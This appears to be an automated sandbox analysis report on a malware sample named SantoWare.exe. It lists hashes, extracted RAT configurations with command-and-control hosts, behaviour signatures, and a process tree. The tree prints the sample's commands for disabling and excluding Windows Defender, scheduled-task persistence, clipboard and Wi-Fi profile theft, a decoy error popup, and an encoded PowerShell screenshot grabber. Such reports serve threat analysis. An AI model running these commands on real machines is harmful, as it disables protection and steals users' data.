Analysis

  • max time kernel
    600s
  • max time network
    600s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-12-2024 18:42

General

  • Target

    SantoWare.exe

  • Size

    8.1MB

  • MD5

    9146e533d8cdfdfd620e221d6b0c8fb0

  • SHA1

    0e2e6ae26b93d62bc6e439b98ab278fd9f877c22

  • SHA256

    164cf475b4a37a4c142125bdc1808f4bc5f0f8f1efa555c65609b83b1704a7b9

  • SHA512

    a73bd811f10dee9035eb075ef4487c21c5de231e725311d3638655cc723681cf419f5d0bbcc4e0557bd6e2d3e71c52fedfe5bbde8ca09a62728249132fa23d59

  • SSDEEP

    196608:S8HXVmgfjPEbX2bVj180+qWc67W21Jn2khSs50CG11:S8HXY+zEz2JZ80jv6b1JjEAGv

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

147.185.221.24:18891

Mutex

ojozazfbghcdrrcaa

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

xworm

Version

5.0

C2

ma-compile.gl.at.ply.gg:18894

Mutex

RJpwA4Zvno655gyq

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

arrowrat

Botnet

DiscordCClient

C2

know-england.gl.at.ply.gg:18903

Mutex

vlCHETDFA

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • Arrowrat family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Xworm Payload 2 IoCs
  • Detects Xworm 2 IoCs

    Detects XWorm.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Async RAT payload 1 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in System32 directory 8 IoCs
  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 45 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SantoWare.exe
    "C:\Users\Admin\AppData\Local\Temp\SantoWare.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:4276
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\DiscordVcClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1020
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "DiscordVcClient" /SC ONLOGON /TR "C:\Windows\System32\DiscordVcClient.exe" /RL HIGHEST
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:3160
    • C:\Windows\System32\DiscordVcClient.exe
      "C:\Windows\System32\DiscordVcClient.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\DiscordXClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2288
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "DiscordXClient" /SC ONLOGON /TR "C:\Windows\System32\DiscordXClient.exe" /RL HIGHEST
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:2912
    • C:\Windows\System32\DiscordXClient.exe
      "C:\Windows\System32\DiscordXClient.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\DiscordXClient.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:4056
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DiscordXClient.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        PID:3620
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Client.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2892
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "Client" /SC ONLOGON /TR "C:\Windows\System32\Client.exe" /RL HIGHEST
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:1860
    • C:\Windows\System32\Client.exe
      "C:\Windows\System32\Client.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3688
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        3⤵
        • Boot or Logon Autostart Execution: Active Setup
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2156
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
        3⤵
          PID:2936
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
          3⤵
            PID:2112
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1416
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /F /TN "Built" /SC ONLOGON /TR "C:\Windows\System32\Built.exe" /RL HIGHEST
          2⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4636
        • C:\Windows\System32\Built.exe
          "C:\Windows\System32\Built.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3372
          • C:\Windows\System32\Built.exe
            "C:\Windows\System32\Built.exe"
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:4892
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3708
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                PID:1684
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3168
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                5⤵
                • Command and Scripting Interpreter: PowerShell
                PID:2320
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed To Inject To Roblox Instance ( Error 315 Possible Invalid Offsets ) ', 0, 'Error', 0+16);close()""
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3712
              • C:\Windows\system32\mshta.exe
                mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed To Inject To Roblox Instance ( Error 315 Possible Invalid Offsets ) ', 0, 'Error', 0+16);close()"
                5⤵
                  PID:4004
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3856
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  5⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3612
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4268
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic csproduct get uuid
                  5⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3972
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4884
                • C:\Windows\system32\reg.exe
                  REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                  5⤵
                    PID:3904
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                  4⤵
                    PID:4944
                    • C:\Windows\system32\reg.exe
                      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                      5⤵
                        PID:3476
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                      4⤵
                        PID:2668
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic path win32_VideoController get name
                          5⤵
                          • Detects videocard installed
                          PID:5064
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                        4⤵
                          PID:4060
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic path win32_VideoController get name
                            5⤵
                            • Detects videocard installed
                            PID:4436
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                          4⤵
                            PID:1352
                            • C:\Windows\system32\tasklist.exe
                              tasklist /FO LIST
                              5⤵
                              • Enumerates processes with tasklist
                              PID:2352
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                            4⤵
                              PID:2012
                              • C:\Windows\system32\tasklist.exe
                                tasklist /FO LIST
                                5⤵
                                • Enumerates processes with tasklist
                                PID:536
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                              4⤵
                                PID:232
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                  5⤵
                                    PID:3572
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                  4⤵
                                  • Clipboard Data
                                  PID:3816
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-Clipboard
                                    5⤵
                                    • Clipboard Data
                                    PID:3788
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  4⤵
                                    PID:3976
                                    • C:\Windows\system32\tasklist.exe
                                      tasklist /FO LIST
                                      5⤵
                                      • Enumerates processes with tasklist
                                      PID:1340
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    4⤵
                                      PID:3448
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        5⤵
                                          PID:916
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                        4⤵
                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                        PID:3468
                                        • C:\Windows\system32\netsh.exe
                                          netsh wlan show profile
                                          5⤵
                                          • Event Triggered Execution: Netsh Helper DLL
                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                          PID:4336
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "systeminfo"
                                        4⤵
                                          PID:2588
                                          • C:\Windows\system32\systeminfo.exe
                                            systeminfo
                                            5⤵
                                            • Gathers system information
                                            PID:5064
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                          4⤵
                                            PID:1416
                                            • C:\Windows\system32\reg.exe
                                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                              5⤵
                                                PID:4952
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                              4⤵
                                                PID:1632
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAb